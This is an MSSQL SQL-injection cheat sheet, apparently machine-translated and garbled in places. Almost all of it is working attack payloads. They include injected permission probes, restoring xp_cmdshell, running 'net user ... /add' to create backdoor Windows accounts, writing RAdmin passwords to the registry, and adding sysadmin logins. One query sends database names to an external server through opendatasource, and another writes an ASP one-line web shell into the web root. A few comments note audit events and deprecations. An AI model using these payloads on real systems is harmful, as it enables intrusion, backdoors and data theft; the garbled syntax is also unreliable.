// Check the permissions
and 1 = (Select IS_MEMBER ('db _ owner')
And char (124) % 2 BCast (IS_MEMBER ('db _ owner ') as varchar (1) % 2 Bchar (124) = 1; --
// Check whether you have permission to read a database
and 1 = (Select HAS_DBACCESS ('master '))
and char (124) % 2 BCast (HAS_DBACCESS ('master') as varchar (1) % 2 Bchar (124) = 1 --
// Numeric type
and char (124) % 2 Buser % 2 Bchar (124) = 0
// Character type
'and char (124) % 2 Buser % 2 Bchar (124) = 0 and ''= '
// Search type
' and char (124) % 2 Buser % 2 Bchar (124) = 0 and '%' = '
// User name
and user> 0
' and user> 0 and '='
// Check whether the login has SA permission
and 1 = (select IS_SRVROLEMEMBER ('sysadmin ') ); --
And char (124) % 2 BCast (IS_SRVROLEMEMBER (0x730079007300610064006D0069006E00) as varchar (1) % 2 Bchar (124) = 1 --
// Check whether the database is MSSQL
and exists (select * from sysobjects); --
// Check whether multiple statements are supported
; declare @ d int; --
// Restore xp_cmdshell
; exec master .. dbo. sp_addextendedproc 'xp _ external shell', 'xp log70. dll '; --
select * from openrowset ('sqloledb', 'server = 192.168.1.200, 1433; uid = test; pwd = pafsp', 'select @ version ')
// Note: in SQL Server 2005 and later, xp_cmdshell, the OLE Automation procedures (sp_OACreate / sp_OAMethod) and ad hoc OPENROWSET access are disabled by default; turning them on goes through sp_configure, which makes a change to those options a useful audit event.
// -----------------------
// Execute the command
// -------------------------
// First enable the sandbox mode:
exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1
// Then use jet.oledb to execute the system command:
select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c: \ winnt \ system32 \ ias. mdb ', 'select shell ("cmd.exe/c net user admin admin1234/add")')
// Execute the command
; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ WINNT \ system32 \ cmd.exe/C net user paf pafpaf/add '; --
EXEC [master]. [dbo]. 
[xp_cmdshell] 'COMMAND/c md c: \ 100'
// To determine whether the xp_cmdshell extended stored procedure exists:
http://192.168.1.5/display.asp?keyno=188 And 1 = (Select count (*) FROM master. dbo. sysobjects Where xtype = 'X' AND name = 'xp _ mongoshell')
// Write to the registry
exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1
REG_SZ
// Read the registry
exec master .. xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon', 'userinit '
// Read the contents of a directory
exec master .. xp_dirtree 'C: \ winnt \ system32 \ ', 1, 1
// Database backup
backu P database pubs to disk = 'C: \ 123. bak '
// Expose the length (row count)
And (Select char (124) % 2 BCast (Count (1) as varchar (8000) % 2 Bchar (124) From D99_Tmp) = 0; --
// Method for changing the sa password: after connecting with an integrated SQL tool, run the command
exec sp_password NULL, 'new password', 'sa '
// To add or delete a user test with sa permission:
exec master. dbo. sp_addlogin test, ptlove
exec master. dbo. sp_addsrvrolemember test, sysadmin
// Note: sp_addlogin and sp_password are deprecated in current SQL Server in favour of CREATE LOGIN / ALTER LOGIN; in either form, the creation of a login and a change in sysadmin role membership are server-level events that SQL Server Audit can record.
// Statement to delete xp_cmdshell:
exec sp_dropextendedproc 'xp _ stored shell'
// Add an extended stored procedure
EXEC [master] .. sp_ad Dextendedproc 'xp _ proxiedadata ', 'c: \ winnt \ system32 \ sqllog. dll'
GRANT exec On xp_proxiedadata TO public
// Stop or start a service.
Exec master.. xp_servicecontrol 'stop', 'schedule'
exec master... xp_servicecontrol 'start', 'schedule'
// dbo.xp_subdirs lists only the subdirectories in a directory.
Xp_getfiledetails 'C: \ Inetpub \ wwwroot \ SQLInject \ login. asp '
// dbo.xp_makecab compresses multiple target files into one specified target file. All the files to be compressed can be appended at the end of the parameter list, separated by commas.
Dbo. xp_makecab 'C: \ test. cab ', 'mszip', 1, 'c: \ Inetpub \ wwwroot \ SQLInject \ login. asp ', 'c: \ Inetpub \ wwwroot \ SQLInject \ securelogin. 
asp '
// xp_terminate_process stops a running program; the parameter it takes is the process ID. Open Task Manager and choose PID under "View" > "Select Columns" to see the process ID of each running program.
xp_terminate_process 2484
// xp_unpackcab uncompresses the file.
Xp_unpackcab 'C: \ test. cab ', 'c: \ temp', 1
// forbidden does not exist. regedit /e cannot be used to import the registry file, but the MSSQL connection has sa permission. Run the following command:
EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ RAdmin \ v2.0 \ Server \ Parameters', 'parameter ', 'reg _ BINARY', 0x02ba5e187e2589be6f80da0046aa7e3c
// This changes the password to 12345678.
// If you want to modify the port value:
EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ RAdmin \ v2.0 \ Server \ Parameters', 'Port', 'reg _ BINARY ', and 0xd20400
// This changes the port value to 1234.
create database lcx;
create TABLE ku (name nvarchar (256) null);
Create TABLE biao (id int NULL, name nvarchar (256) null );
// Obtain the database names
insert into opendatasource ('sqloledb', 'server = 211.39.145.163, 1443; uid = test; pwd = pafpaf; database = lcx '). lcx. dbo. ku select name from master. dbo. sysdatabases
// Create a table in master to see whether the permissions allow it
Create a TABLE master .. d_TEST (id nvarchar (4000) NULL, Data nvarchar (4000) NULL); --
// Use sp_makewebtask to write a one-line script directly into the web directory:
http://127.0.0.1/dblogin123.asp?username=123 '; Exec % 20sp_makewebtask % 20 'd: \ www \ tt \ 88. asp ',' % 20 select % 20 ''<% 25 execute (request (" a ") % 25>'' % 20 '; --
// Note: sp_makewebtask depends on the 'Web Assistant Procedures' option in SQL Server 2005 and is gone from SQL Server 2008 onward.
// Update table content
Update films SET kind = 'dramatic 'Where id = 123
// Delete content
delete from table_name where Stockid = 3